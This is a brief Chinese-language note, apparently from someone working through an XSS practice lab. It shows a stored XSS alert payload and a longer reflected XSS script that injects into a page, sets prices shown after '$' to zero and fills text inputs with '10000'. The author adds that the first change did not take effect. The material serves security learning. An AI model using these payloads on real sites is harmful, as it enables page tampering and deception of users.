1、存储型
脚本:><script>alert('just for fun')</script>
------------------------------------------------------------------------------------------------------------------------------------------------------------
2、反射型
题意:通过反射型XSS,修改页面数据来达到攻击的目的。
(有点难度,参考答案做的。。。)
代码如下
'><script>
alert('This kinda is called reflected XSS or First-Order XSS!');
for(i=0;i<=document.getElementsByTagName("td").length-1;i++)
{
if(document.getElementsByTagName("td")[i].innerHTML.indexOf('$')>0)
{
document.getElementsByTagName("td")[i].innerHTML = '$0';<!--找到$符号,将$符号后面的值都替换为0-->
}
};
for(i=0;i<=document.getElementsByTagName("input").length-1;i++)
{
if(document.getElementsByTagName("input")[i].type=='text')
{
document.getElementsByTagName("input")[i].value='10000';<!--找到文本域(text),将文本域里的值都替换为10000-->
}
};
</script>
效果:
第一个篡改,修改$后值为0,不知道为什么没有生效。。。原因还不晓得。。。。
------------------------------------------------------------------------------------------------------------------------------------------------------------